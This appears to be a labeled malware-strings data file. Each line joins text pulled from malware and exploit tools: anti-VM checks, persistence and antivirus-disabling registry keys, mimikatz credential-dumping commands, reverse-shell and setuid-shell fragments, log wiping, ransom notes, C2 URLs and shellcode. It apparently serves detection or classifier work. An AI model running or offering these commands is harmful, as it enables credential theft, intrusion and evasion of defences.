1 ven_vmware_prod_vmware_virtual_hgfs.sysmhgfs.sysprleth.sysprlfs.sysprlmouse.sysprlvideo.sysprl_pv32.sysvpc-s3.sysvmsrvc.sysvmx86.sysvmnet.sysvmicheartbeatvmicvssvmicshutdownvmicexchangevmdebugvmmousevmtoolsvmmemctlvmwarevpcbusvpcuhubmsvmmoufxenevtchnxennetxennet6xensvcxenvdbxenvmmvboxhook.dllvboxservicevboxtrayvboxmousevboxguestvboxsfvboxguestadditionsvbox harddisk00-05-6900:05:6900056900-50-5600:50:5600505600-0c-2900:0c:29000c2900-1c-1400:1c:14001c1408-00-2708:00:27080027\\\\.\\physicaldrive0sandbox\\sample\\virusmaltesttequilaboomboommalwareollydbgwindbgframeclassselect description from win32_videocontrollerselect * from win32_videocontrollervirtualbox graphics adaptervmware svga iivm additions s3 trio32/64parallelremotefxcirrus logicmatroxkernel32.dllisdebuggerpresentcontinuedebugeventprocexp.exeprocmon.exeprocessmonitor.exewireshark.exefiddler.exewindbg.exeollydbg.exewinhex.exeprocesshacker.exehiew32.exe\\\\.\\ntice\\\\.\\sice\\\\.\\syser\\\\.\\syserboot\\\\.\\syserdbgmsgsoftware\\microsoft\\windows\\currentversionregqueryvalue55274-640-2673064-2395076487-337-8429955-2261476487-640-1457236-23837sbiedll.dll76487-644-3177037-23510vboxservice.exevmware.exevmware-authd.exevmware-hostd.exevmware-tray.exevmware-vmx.exevmnetdhcp.exevpxclient.exehardware\\description\\systemhardware\\description\\system\\biossystemmanufacturersoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\disallowrunsoftware\\microsoft\\windows\\currentversion\\uninstall\\software\\policies\\microsoft\\windows defenderantivirusdisablenotifydontreportinfectioninformationdisableantispywareruninvalidsignaturesantivirusoverridecheckexesignaturesblackd.exeblackice.exelockdown.exelockdown2000.exetaskkill.exetskill.exesmc.exesniffem.exezapro.exezlclient.exezonealarm.exesoftware\\microsoft\\security centeruacdisablenotifysystem\\currentcontrolset\\services\\sharedaccess\\parameters\\firewallpolicyenablefirewallfirewalldisablenotifynetsh firewall add 
allowedprogramsoftware\\microsoft\\windows\\currentversion\\policies\\systemdisableregistrytoolsdisableregeditenableexecuteprotectionsupportntsetinformationprocessvirtualproctectexsetprocessdeppolicyzwprotectvirtualmemorydisabletaskmgrvirtualallocexntwritevirtualmemorywriteprocessmemorycreateremotethreadcreatethreadshell32.dllwinexecsoftware\\microsoft\\windows\\currentversion\\runsoftware\\microsoft\\windows\\currentversion\\runoncesoftware\\microsoft\\windows\\currentversion\\runservicessoftware\\microsoft\\windows\\currentversion\\runservicesoncesoftware\\microsoft\\windows nt\\currentversion\\winlogonsoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\runsoftware\\microsoft\\windowsnt\\currentversion\\windowssoftware\\microsoft\\windows\\currentversion\\explorer\\sharedtaskschedulercomfile\\shell\\open\\commandpiffile\\shell\\open\\commandexefile\\shell\\open\\commandtxtfile\\shell\\open\\commandwin.inisystem.inistart menu\\programs\\startupsoftware\\classes\\protocols\\handlersoftware\\classes\\protocols\\filtermicrosoft\\windows\\currentversion\\internet settings\\proxyserversoftware\\microsoft\\windows\\currentversion\\internet settings\\proxyenabledrivers\\etc\\hostsadvapi32.dllcontrolservicequeryservicestatusdllcanunloadnowdllinstalldllregisterserverdllunregisterserverws2_32.dllsystem.netwsock32.dllwsastartupsendtorecvfromwsasendtowsarecvfromudpclientmswsock.dllacceptgetacceptexsockaddrswsaacceptwsasockettcplisteneraccepttcpclient.no-ip.org.publicvm.com.linkpc.net.dynu.com.dynu.net.afraid.org.chickenkiller.com.crabdance.com.ignorelist.com.jumpingcrab.com.moo.com.strangled.com.twillightparadox.com.us.to.strangled.net.info.tm.homenet.org.biz.tm.continent.kz.ax.lt.system-ns.com.adultdns.com.craftx.biz.ddns01.com.dns53.biz.dnsapi.info.dnsd.info.dnsdynamic.com.dnsdynamic.net.dnsget.org.fe100.net.flashserv.net.ftp21.netfirewallapi.dll\\currentcontrolset\\services\\tcpip6\\parameters\\interfaces\\system.net.mailsmtpclientmail from:rcpt 
to:cdo.messagecdosmtpservercdosendusingmethodcdoex.dll/cdo/configuration/smtpserverpeercollabexportcontactpeercollabgetapplicationregistrationinfopeercollabgetendpointnamepeercollabgeteventdatapeercollabgetinvitationresponsepeercollabgetpresenceinfopeercollabgetsigninoptionspeercollabinvitecontactpeercollabinviteendpointpeercollabparsecontactpeercollabquerycontactdatapeercollabrefreshendpointdatapeercollabregisterapplicationpeercollabregistereventpeercollabsetendpointnamepeercollabsetobjectpeercollabsetpresenceinfopeercollabsignoutpeercollabunregisterapplicationpeercollabupdatecontacttor\\hidden_service\\private_keytor\\hidden_service\\hostnametor\\locktor\\statenickpingjoinuserprivmsgwininet.dllinternetopenurlinternetwritefileidhttpheaderinfourlmon.dllurldownloadtocachefileurlopenstreamurlopenpullstreamftpgetcurrentdirectoryftpgetfileftpputfileftpsetcurrentdirectoryftpopenfileftpgetfilesizeftpdeletefileftpcreatedirectoryftpremovedirectoryftprenamefileftpdownloadftpuploadftpgetdirectorysocketwsaconnectclosesocketwsacleanupdnsapi.dllgethostentrygetaddrinfogethostbynamewsaasyncgethostbynamednsqueryssleay32.dlllibeay32.dlllibssl32.dllidsslopensslcrypt32.dllsystemtimetofiletimegetsystemtimegetsystemtimeasfiletimecryptcreatehashcryptacquirecontextcrypthashdataopencl.dllnvcuda.dllopengl32.dllcpuminer 2.2.2x-mining-extensionscpuminer 2.2.3x-mining-extensionsufasoft bitcoin-miner/0.20stratumsoftware\\microsoft\\systemcertificates\\spc\\certificatescertopensystemstoreadjusttokenprivilegesgdi32.dlluser32.dllbitbltgetdccheckip.dyndns.orgwhatismyip.orgwhatsmyipaddress.comgetmyip.orggetmyip.co.uksoftware\\vitalwerks\\ducj.maxmind.comgetasynckeystategetkeystatemapvirtualkeygetkeyboardtypesamiconnectsamigetprivatedatasamqueryinformationusecredenumerateacredenumeratewsoftware\\microsoft\\internet account 
managersoftware\\microsoft\\identitycrl\\credssecurity\\policy\\secretswinmm.dllwaveinstartwaveinresetwaveinaddbufferwaveinopenwaveinclosesignons.sqlitesignons3.txtsecmod.dbcert8.dbkey3.dbvncpassviewabe2869f-9b47-4cd9-a358-c22904dba7f7packet.dllnpf.syswpcap.dllwinpcap.dllopenthreadqueueuserapcautorun.infdesktop.inidesktop.lnknetapi32.dllnetsharegetinfonetshareenumultravnc.inistartvncstopvncsystem\\currentcontrolset\\control\\terminal serversoftware\\microsoft\\windows nt\\currentversion\\terminal serversystem\\currentcontrolset\\control\\terminal server\\winstations\\rdp-tcpenableadmintsremotenet start termservicesc config termservice startsoftware\\microsoft\\telnetserveravicap32.dllcapcreatecapturewindowsoftware\\microsoft\\windows nt\\currentversion\\hotfixcreatemutexadvapi32.dllregqueryvalueexaregopenkeyexaregcreatekeyaduplicatetokenexopenprocesstokenlookupprivilegevalueakernel32.dllgetprivateprofileintagetprivateprofilestringawriteprivateprofilestringadeletefileacreatefileafindfirstfileamovefileexafindcloseuser32.dllunhookwindowshookexsetwindowshookexacallnexthookexsoftware\\\\oracle\\\\virtualbox guest additionsvmmouse.sysvmware virtual ide hard drivesystem\\controlset001\\services\\disk\\enumsystem\\\\controlset001\\\\services\\\\disk\\\\enumvmhgfs.sysvmcivmtoolsvmware2vmount2vmusrvcvboxservicevboxtrayxenservice
1 gk%1_slocal t = w.exec2str(\"regedit local r = w.exec2str(\"catap*.txt link*.txt node*.tun virtualencryptednetwork.licencemove o fakevirtualencryptednetwork.dllsinfo | basex b 32url | dext l 30w.exec2str(execstr)netnfo irc | basex b 32urlw.exec(\"wfw status\")exec(\"samdump\")cat virtualencryptednetwork.ini|grepif string.lower(k) == \"securityproviders\" thenexec2str(\"plist b | grep netsvcs\").*account.*|.*acct.*|.*domain.*|.*login.*|.*member.*sauron_kblog_key =resolve hosts that answerprint only replying ipsdo not display mac addressesinject using process name or pid. defaultconvert mode: read log from file and convert to textmaximum running time in seconds64, 64url, 32, 32url or 16.force decoding when input is invalid/corruptthis cruftassemble rows of dns names back to a single string of dataremoves checks of dns names and lengths (during split)randomize data lengths (length/2 to length)n
1 polycrypt pe (c) 2004-2005, jlabsoftware.
1 downloadfile - exception:%s,code:0x%08x.mozilla/4.0 (compatible; msie 7.0; windows nt 5.1)cdllapp::initinstance() - evnet already exists../emptycriss <target ip>cut and paste the following to the telnet prompt:environ define ttyprompt abcdefrunning \\\"tcpdump -n -n\\\", on the environment variable \\$interface, scriptedcannot read $opetc/scripme.override -- are you root?$env{exploit_scripme}the encryption key is ___tempfile2.outunless the -c (clobber) option is used, if two retr commands of themywarn(\"end of $destfile determined by \\\"^connection closed by foreign host\\\"\")end of $destfile determined by \"^connection closed by foreign host> /var/log/audit/audit.log; rm -f .pastables to run on target:cp /var/log/audit/audit.log .tmphere is the first good cron session fromno need to clean login lines.sh >/dev/tcp/ <&1 2>&1test: mungedport=%6d pp=%d unmunged=%6decho \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"-x [ port to start mini x server on default = 12121 ]\"callback_port=32177usage: %s -e -v -i target ip [-c cert file] [-k key file]type=licxfer&ftp=%s&source=/var/home/ftp/pub&version=na&licfile=[-l log file] [-m save mac time file(s)] [-p server port]chown root sh; chmod 4777 sh;cp /bin/sh .;chown root sh;echo clean up when elevated:exe=$dir/sbin/ey_vrupdatedel --- usage: %s -l file -w wtmp -r userroasting ->%s<- at ->%d:%d<-rbnoil -roasting ->requested forwarding of port %d but user is not root.internal error: we do not read, but chan_read_failed for istate~# - list forwarded connectionspacket_inject_ignore: blockresult = self.send_command(\"ls -al %s\" % self.options.dir)cmd += \"d=-l%s \" % self.options.listen_portuse this on target to get your rat:$ratremotename && $command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>target is not vulnerable. exitingsending final buffer: evil_blocks and shellcode...timeout waiting for daemon to die. 
exploit probably failed.usage: %s <host> <port> e <contents of a local file to be executed on target>writing your %s to target.(e)xploit, (r)ead, (m)ove and then write, (w)rite-c command: shell command stringcannot combine shell command mode with args to do socket reuse-r: reuse socket for nopen connection (requires -t, -d, -f, -n, no -c)firing with the same hosts, on altername ports (target is on 8080, listener on 443)recieved unknown command payload: 0x%xusage: eslide [options] <-t profile> <-l listenerip> <targetip>-------- delete key - remove a *closed* tabusage: ./exp command display_to_return_tosizeof shellcode = %dexecve failed!echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"echo \"call back port2 = ${sport}\"* * * * * root chown root %s; chmod 4755 %s; %s[-] kernel not vulnerable[-] failed to spawn shell: %s-s shell use shell instead of %susage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]error: not vulnerableport=%d connected! xxx.xxxxxxexecuting ./ebbnew_linux -r %s -v %s -a %s %s -t %s -p %s./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772version 1 - start with option #18 first, if it fails then try this option%s is a wrapper program for ebbnew_linux exploit for sparc solaris rpc services# building shellcode into exploit.%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\" -d 10.0.0.1 -p 80# starting exhaustive attack against usage: $prog [-f directory] -p prognum [-v ver] [-t proto] -i ipadr$gotsunos = ($line =~ /program version netid address service owner/ );+ bruteforce mode.+ host is not running samba!+ connecting back to: [%d.%d.%d.%d:45295]+ exploit failed, try -b to bruteforce.usage: %s [-bbccdfprsstv] [host]** significantly improve processing time-c cmd_name: strncmp() search for 1st %d chars of commands that mysql \\$d --host=\\$h --user=\\$u --password=\\\"\\$p\\\" -e \\\"select * from \\$twindow 3: $0 -uadmin -ppassword -i127.0.0.1 -dipboard -c\\\"sleep 500|nc$ua->agent(\"mozilla/4.0 
(compatible; msie 6.0; windows nt 5.0)\");$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";usage: %s -i <ip_addr/hostname> -c <command> -t <target_type> (-u <port> | -t <port>) -i target ip address / hostname note: choosing the correct target type is a bit of guesswork.solaris rpc.cmsd remote root exploitif one choice fails, you may want to try another.shellfilecompleted.1zeke_remove%s/%s server failing (looping), service terminatedgetpwnam: %s: no such userexecv %s: %m%s/%s: unknown service?usage: %s <shellcode> <output_file>here is the decoder+(encoded-decoder)+payloadusage: %s hostip port cmd [printer_name]command must be less than 61 chars__rw_read_waiting__mutexkind__rw_psharedusage: %s [-v] -t <target_ip> -p porterror - shellcode not as expected - unable to fix upwarning - core wipe mode - this will leave a core file on target[-c] wipe target core file (leaves less incriminating core on failed target)-a <jumpaddr> (shellcode address)*** insane undocumented incremental port mode!!! ***%x:%d --> %x:%d %d bytesclient: can't bind to local address, are you root?unable to register portcould not resolve destinationraw troubles$gotgs=1 if (($line =~ /scan for (sol|snmp)\\s+version/) orusage: $prog [-f file] -p prognum [-v ver] [-t proto] -i ipadr$scanth = $scanth . \" -s \" . $scanthreads;print \"java -jar jscanner.jar$scanth$list\\n\";exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");$xargs=\"-title \\\"kill process $pid?\\\" -name \\\"kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;.tmp.%d.xxxxxx[-] couldn't create temp file/boot/system.map-%s[+] shellcode prepared, re-executing[-] kernel not vulnerable: prctl[-] shell failed[!] selinux apparently enforcing. continue [y|n]? t=<target ip> [o=<port>] y=<target type>no command given!! bailing...no port. 
assuming 22.../tmp/ratload.tmp.shremote usage: /bin/telnet locip locport < /dev/console | /bin/sh\"uncompress -f ${name}.z && path=. ${args1} ${name} ${args2} && rm -f ${name}exploit_scripme=\"$exploit_scripme\"deftarget=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`fatal error: -x port and -n port must not be the same.example: ewok -t target publicusage: cleaner host community fake_prog-g - subset of -m that green spirit hits --- ewok versionusage: xspy -display <display> -delay <usecs> -upchown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cronusage: $0 ( -s ip port | cmd )os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$cmd\")php_script=\"$home/public_html/info$x.php\"cat > /dev/tcp/127.0.0.1/80 <<end*** sorry about the raw output, i'll leave it for now-scan winn %s oneset uremoteuploadcommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"send \"\\[ \\\"\\$bash\\\" = \\\"/bin/bash\\\" -o \\\"\\$shell\\\" = \\\"/bin/bash\\\" \\] &&system rm -f /current/tmp/ftshell.latest# ftshell -- file transfer shellwelcome to the network scanning toolscanning port %d/current/down/cmdout/scansscan for ssh versionprogram vers proto port serviceusage: %s [-v os] [-p] [-r] [-c command] [-a attacker] targetsending shellcode as part of an open command...cmdshellcodeyou will not be able to run the shellcode. exiting...e.g.: -n 1-1024,1080,6666,31337 # default is to dump out all scanned hosts found$bool .= \" -r \" if (/mibiisa.* -r/);sadmind is available on two ports, this also works)-x ip gives \\\"hostname:# users:load ...\\\" if positive xwin scanheader(\"set-cookie: bbsessionhash=\" . \\$hash . 
\"; path=/; httponly\");if ($code =~ /proxyhost/) {\\$rk[1] = \\$rk[1] - 1;#existsuser($u) or die \"user '$u' does not exist in database.\\n\";temp = ((left >> 1) ^ right) & 0x55555555right ^= (temp << 16) & 0xfffffffftempresult = \"\"num = self.bytes2long(data)if { [string length $uremoteuploadcommand]processuploadglobal dothisreallyquiet[-] failed to map file: %s[-] can not null terminate input data[!] name has size of 0!rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')client_auth = binascii.hexlify(lo_execute('openssl rand 16'))[%.2u%.2u%.2u%.2u%.2u%.2u]0123456789abcdefabcedf:a}%j,r
1 seven_legion@india.comfor decrypt files
1 z{%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}yuipwdfile0yuipkdfile0yuicrypted0yui1.0post %s http/1.0accept-encoding: identity, *;q=0ke
1 *mlt* = %*ip* = %*victimo* = %*name* = %[start][data]we control your digital worldrc4initializerc4decrypts
1 get_badloginaddressget_lastfailedloginads_uf_encrypted_text_password_allowedget_passwordexpirationdatebin_execsql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + bin_textbox_saveptc.text=\"<a href=\\\"javascript:bin_postback('zcg_closepm','\"+bin_tobase64(de.key.tostring())+\"')\\\">close</a>\";bin_execsql(\"if object_id('bin_temp')is not null drop table bin_temp\");-slave <connecthost> <connectport> <transmithost> <transmitport>[+] make a connection to %s:%d....cmshared_get_ptr_from_atom_cmshared_get_ptr_from_atom[-] transmitport invalid.[+] waiting for client on port:%d ......\\setup.exemsi.dll.urlutmsi.dllutsetup.exeut/c del /q %sp
1 \\\\/applications/automator.app/contents/macos/docklightioreg -l | grep \"ioplatformserialnumber\" | awk -f+:users:shared:userevent.app:contents:macos:rm '/users/shared/userevent.app/contents/resources/userevent.icns'osascript -e 'tell application \"system events\" to get the hidden of every login item'osascript -e 'tell application \"system events\" to get the name of every login item'osascript -e 'tell application \"system events\" to get the path of every login item'servervisible \x00.aspack.adataaspack.aspack.ccgbitartsdastub!epackfsg!kkrunchy.mackt.maskpemew.mpress1.mpress2.neolite.nsp1.nsp2.nsp0.packedpebundlepebundlepec2topecompact2pec1pec2pec2mopelocknt.perplexpeshield.petiteprocrypt.rlpackrcryptor.rpcrypt.sforce3.spack.svkpthemida.themida.upack.bydwingupx0upx1upx2.upx0.upx1.upx2.vmp0.vmp1.vmp2vprotectwinlicenwwpack.yp.y0damozilla/4.0 (compatible; msie 6.0; windows nt 5.; sv1)trj:html err.trj:workfunc start.trj:cmd time out.trj:thread time out.trj:create pt done.trj:create pt error: mutex already exists.create pippe failed!transfering fileput paras error:cmd time out..cmd has been killed.h
1 microsoft enhanced cryptographic provider v1.0\\system32\\svchost.exe:repeat\x0d\x0adel %s\x0d\x0aif exist %s goto :repeat\x0d\x0adel %%0.php?compname=/path_active.php?compname=/fetch_updates_pops.php?compname=/is_array_own.php?compname=/checkpkg.php?compname=/versionchk.php?srs=/vtris.php?srs=/vtris1.php?srs=/fetch_updates_step.php?compname=/c wmic diskdrive list brief > /petal_active.php?compname=percf001.dat_percf001.datcurl_easy_performhttp://199.91.173.45/percf002.dathttp://199.91.173.45/update_dll.dllhttp://199.91.173.45/libcurld.dll!microsoft!winusb.exec:\\intel\\logs\\file.pdbc:\\users\\tranchulas\\documents\\visual studio 2008\\projects\\upload\\release\\upload.pdbc:\\users\\cert-india\\documents\\visual studio 2008\\projects\\ufile\\release\\ufile.pdbdoworku
1 please restart your computer and wait for instructions for decrypting your files kscdsromantic9%9r9f9q9i
1 download excuteencryptorfunctionpointer %d%s\\%s.lnkmac:%s-cpu:%s-hd:%sfeed back responce of hostget token at hostdwn md5 err\
1 /c c:\\progra~1\\msbuild\\temp\\7za.exe e -oc:\\progra~1\\msbuild\\temp\\ c:\\progra~1\\msbuild\\temp\\inf.7z -p122333444455555 -y/c c:\\progra~1\\msbuild\\temp\\32.exe privilege::debug \"sekurlsa::logonpasswords full\" exit > c:\\progra~1\\msbuild\\temp\\%s.txt/c c:\\progra~1\\msbuild\\temp\\64.exe privilege::debug \"sekurlsa::logonpasswords full\" exit > c:\\progra~1\\msbuild\\temp\\%s.txt/c c:\\progra~1\\msbuild\\temp\\crypt.exe --encrypt c:\\progra~1\\msbuild\\temp\\public.key c:\\progra~1\\msbuild\\temp\\%s.txt c:\\progra~1\\msbuild\\temp\\%s.inc/c attrib +h +s c:\\progra~1\\msbuild\\temp
1 abccbadanabccbtkeyloggerufiletransferttdownloadsettings#@#@#plugindataonpluginmessagee-dataquaverse/crypterqrypt.classjarizer.classurlconnection.class!!<3safia<3!!!!elmattadordz!!stub_2.propertiess
1 [mimikittenz.memprocinspector]process_all_access = process_terminate | process_create_thread | process_set_sessionid | process_vm_operation |intptr processhandle = minterop.openprocess(minterop.process_wm_read | minterop.process_query_information, false, process.id);&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=[dllimport(\"kernel32.dll\", setlasterror = true)]3aesversonex12cupdategates11cupdatebillzn8cutility7decryptepcipkcizn13cthreadattack5startep11ccmdmessagemr.blackvers0nex:%s|%d|%d|%sprivmsg %s :[std]hitting %snotice %s :tsunami <target> <secs>notice %s :i'm having a problem resolving my host, someone will have to spoofs me manually.sys_writesys_getdentssys_getdents64sys_getpgidsys_getsidsys_setpgidsys_killsys_tgkillsys_tkillsys_sched_setschedulersys_sched_setparamsys_sched_getschedulersys_sched_getparamsys_sched_setaffinitysys_sched_getaffinitysys_sched_rr_get_intervalsys_wait4sys_waitidsys_rt_tgsigqueueinfosys_rt_sigqueueinfosys_prlimit64sys_ptracesys_migrate_pagessys_move_pagessys_get_robust_listsys_perf_event_opensys_unamesys_unlinksys_unlikatsys_renamesys_readkobject_dellist_del_initinet_ioctlset_fs_rootset_fs_pwd__virt_addr_validinit_fsbad_file_opsbad_file_aio_readsecurity_opsdefault_security_opsaudit_enabledcommit_credsprepare_kernel_credptmx_fopsnode_statesdlopendlsymfopen64__fxstat__fxstat64__lxstat__lxstat64rmdir__xstat__xstat64fdopendir
1 nullfilenameusage: %s <input file> <output file> <port1> [port2] [port3] [port4] [port5] [port6]you may enter between 1 and 6 ports to change the defaults.sprqwvusage: %s [d|e] session_key ciphertextwhere session_key and ciphertext are strings of hexd = decrypt mode, e = encrypt modebad mode, should be 'd' or 'e'wshtcpip.wshgetsocketinformation\\\\.\\%hs.?avresultip@mini_mcl_cmd_netconnections@@c
1 crypt
1 encryptpe_init
1 load auxiliary object=%s requested by file=%ssize of new packet, should be %d <= size <= %d bytesverbosity - show lengths, packet dumps, etc%s: error while loading shared libraries: %s%s%s%s%scannot dynamically load executablebinding file %s to %s: %s symbol `%s' [%s]randomize the initiator cookievalid commands are: smac, dmac, int, pack, done, goinvalid format suggest dmac=00:00:00:00:00:00smac=%02x:%02x:%02x:%02x:%02x:%02xnot everything is set yet%d - %d, %d%d - %lu.%lu %d.%lu%d - %d %d*** target may be susceptible to falsemorel ****** target is susceptible to falsemorel ***if (!(($srcip,$dstip,$srcport,$dstport) = ($line=~/^([a-f0-9]{8})([a-f0-9]{8})([a-f0-9]{4})([a-f0-9]{4})$/)))$ans=\"$srcip:$srcport -> $dstip:$dstport\";return \"error:$line is not a valid port\";$dstport=hextoport($dstport);sub hextoport$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;return \"error:$line is not a valid address\";print \"error: the filename or hex representation needs to be one argument try using \\\"'s\\n\";push(@octets,$byte_table{$tempi});print hextoip($argv[0]);generates the persistence file name and prints it out.name: a hostname: 'host.network.com', a decimal numeric offset within-a www.badguy.net,cname,1800,host.badguy.net \\\\what is the name of your pbd:you are now ready for a screamplowbinstore enabled implants.active connections will be maintained for this tunnel. timeout:%s: compatible with blatsting version 1.2can't find target version module!class payload:connection timed out. only a problem if the callback was not received.could not reliably detect cookie. 
using 'session_id'...def build_exploit_payload(self,cmd=\"/tmp/httpd\"):self.build_exploit_payload(cmd).got_loader_start_textimplantkeepgoingupgrade_implantunable to save off predefinedscans directoryre-orders the networkprofiler scans so they show up in order in the lpfailed to create version-specific payload(are you sure you did \"make [version]\" in versions?)-s/--srcip <sourceip> use given source ip (if sniffer doesn't collect source ip)convert an xml file generated by the blatsting sniffer module into a pcap capture file.(might have to delete key in ~/.ssh/known_hosts on linux box)scp bglee-should be 4bfe94b1 for clean bootloader version 3.0; scp <configured implant> <username>@<ipaddr>:onfigerror: failed to open %s: %d__libc_start_main@@glibc_2.0serial number: %sstrerror@@glibc_2.0error: mmap failed: %dsd_processcontrolpacketencryption_rc4setkey^get.*(?:/ |\\.(?:htm|asp|php)).*\\r\\nthis program will configure a jetplow userarea file.error running config_implant.note: it assumes you are operating in the install/lp/jp directory. this assumption first ip address for beacon destination [127.0.0.1]are you sure? don't forget that netscreen firewalls require bananaliar!! loadedpagetable.chandler_readbiosmacdef init > /tmp/.netrc;/usr/bin/wget http://home=/tmp ftp >> /tmp/.netrc;/usr/rapidstream/bin/tftpcreated shell_command:rm -f /tmp/.netrc;echo quit >> /tmp/.netrc;echo binary >> /tmp/.netrc;chmod 600 /tmp/.netrc;created cli_command:firefox http://127.0.0.1:8000/$_namewhat is the name of your implant:killall thttpdcopy http://<ip>:80/$_name flash:/$_nameexecute_post = '\\xe8\\x00\\x00\\x00\\x00\\x5d\\xbe\\xef\\xbe\\xad\\xde\\x89\\xf7\\x89\\xec\\x29\\xf4\\xb8\\x03\\x00\\x00\\x00tiny_exec = '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00auth_id = '\\x31\\xc0\\xb0\\x03\\x31\\xdb\\x89\\xe1\\x31\\xd2\\xb6\\xf0\\xb2\\x0d\\xcd\\x80\\x3d\\xff\\xff\\xff\\xff\\x75\\x07
1 cmd.exe /c %s > %sexecute cmd timeout.rundll32.exe \"%s\",settingdownloadfile - exception:%s.cdllapp::initinstance() - evnet create successful.uploadfile - encryptbuffer errorw
1 :send to server failed.handshake with the server failed. error:decryption failed. context expired.mozilla/4.0 (compatible; msie8.0; windows nt 5.1)!(*@)(!@port!(*@)(!@urlmytmpfile.datsvchost.dll.logmozilla/4.0 (compatible; windows nt 5.1; msie 7.0; trident/4.0)%s\\%c%c%c%c%c%c%cwait:dcryption error! invalid charactersvcmsn.dllconfig service %s ok.install an service hosted by svchost.the dll file that to be released.man,it's meoh,shithallelujahnret == socket_errorrouji\\release\\install.pdbrouji\\svcmain.pdbminiaspwakeup=download ok!command is null!device_input.asp?device_t=mozilla/4.0 (compatible; windows nt 5.1; msie 7.0)name=%s&userid=%04d&other=%c%snoclientuser-agent: mozilla/4.0 (compatible; msie 5.00; windows 98) ksmmupfileokupfileerfxftest*(sy)# cmdsend = %d@***@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>>>sleep:down:*========== bye bye ! ==========*letusgohtppmmv2.0.0.1mozilla/4.0 (compatible; )filestocfilectosreshellpostvaluepostdatapostfileclientkeystart cmd failure!downloadcopy:download:geturl:1.234.1.68content=reqpath=savepath=w!r@o#n$gkernel32.dlleclipse_a\\pjts\\eclipse_client_b.pdbxiaomesuncloud-code/uc_server/data/forum.aspserverfile is smaller than clientfile\\m tools\\moondll
1 ./epicbanana_2.0.0.1.py -t 127.0.0.1 --proto=ssh --username=cisco --password=cisco --target_vers=asa804 --mem=na -p 22 -t target_ip, --target_ip=target_ip -- either 127.0.0.1 or win ops ip./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport rhp --dport rhp--target_vers=target_vers target pix version (pix712, asa804) (required)-p dest_port, --dest_port=dest_port defaults: telnet=23, ssh=22 (optional) - change to local redirect portthis operation is complete, bananaglee willcd /current/bin/fw/bgxxxx/install/lpprofprocesspacketgettimeslotcmdhandlergetipipcmdhandlerprofstartscantmpdata.1resetcmdhandlercd /current/bin/fw/bananaglee/$bgver/install/lp/jetplow***** please place your ua in /current/bin/fw/ops *****ln -s ../jp/orig_code.bin orig_code_pixgen.bin***** welcome to jetplow *****get_lsl_interfacesencryptfc4payloadbeacon_getconfigformbeaconpacketbeacon_reconfiguredumpconfiggetstatushandlerxtractdatato disable password checking on target:[-] target is running[-] problem importing version-specific shellcode from[+] importing version-specific shellcode[-] unsupported target version, abortthe --spoof option requires 3 or 4 fields as follows redir_ip[-] timeout waiting for response - target may have crashed[-] no response from health check - target may have crashedmemset 00e9a05c 4 38845b88_hidecmdmemset 013abd04 1 0dcould not connect to target device: %s:%d. please check ip address.command data size is invalid for an exec cmda script was specified but target is not a ppc405-based netscreen (ns5xt, ns25, and ns50). executing scripts is supported but maexecute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n]execute 0x%08x with args (%08x, %08x, %08x): [y/n][%d] execute code.execute 0x%08x with args (%08x): [y/n]dump_value_lhash_doall_argeggcode is complete. pass execution to it? [y/n]required by seconddatehelp='output file name (optional). 
by default the resulting data is written to stdout.')data = '<html><body onload=\"location.reload(true)\"><iframe src=\"%s\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"version='%prog 1.0',usage='%prog [ ... options ... ] url',readflashhandlerflashrtnspix6x.cfix_ip_cksum_incrwriteflashhandlerusage %s \"<tcpdump pcap string>\" <outfile>error reading dump file: %struncated dump file; tried to read %u captured bytes, only got %lu%s: link-layer type %d isn't supported in savefilesdlt %d is not one of the dlts supported by this deviceusage: storefc.py --configfile=<path to xml file> --implantfile=<path to binstore implant> [--outputfile=<file to write the confraise exception, \"must supply both a config file and implant file.\"this is wrapper for store.py that felonycrowbar will use. thisdef hexdump(x,lead=\"[+] \",out=sys.stdout):print >>out, \"%s%04x \" % (lead,i),print >>out, \"%02x\" % ord(x[i+j]),print >>out, sane(x[i:i+16])components/modules/biosmodule/implant/e28f6/../e28f640j3_asm.scmosreadbytechecksumareaconfirmed.0writespeedplow.c--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s --lptimeout %u%s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options]* [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration)%s version %s already has persistence installed. if you want to uninstall,the active module(s) on the target are not meant to be persistedlp.c:pixsecurity - improper number of bytes read in security/interface informationlp.c:pixsecurity - not in sessiongetmodinterface__preloadedmodulesshowcommandsreadmoduleinterfacewrapping_not_necessary_or_wrapping_okget_cmd_listlp_listen2killcmdlistmodule and implant versions do not match. 
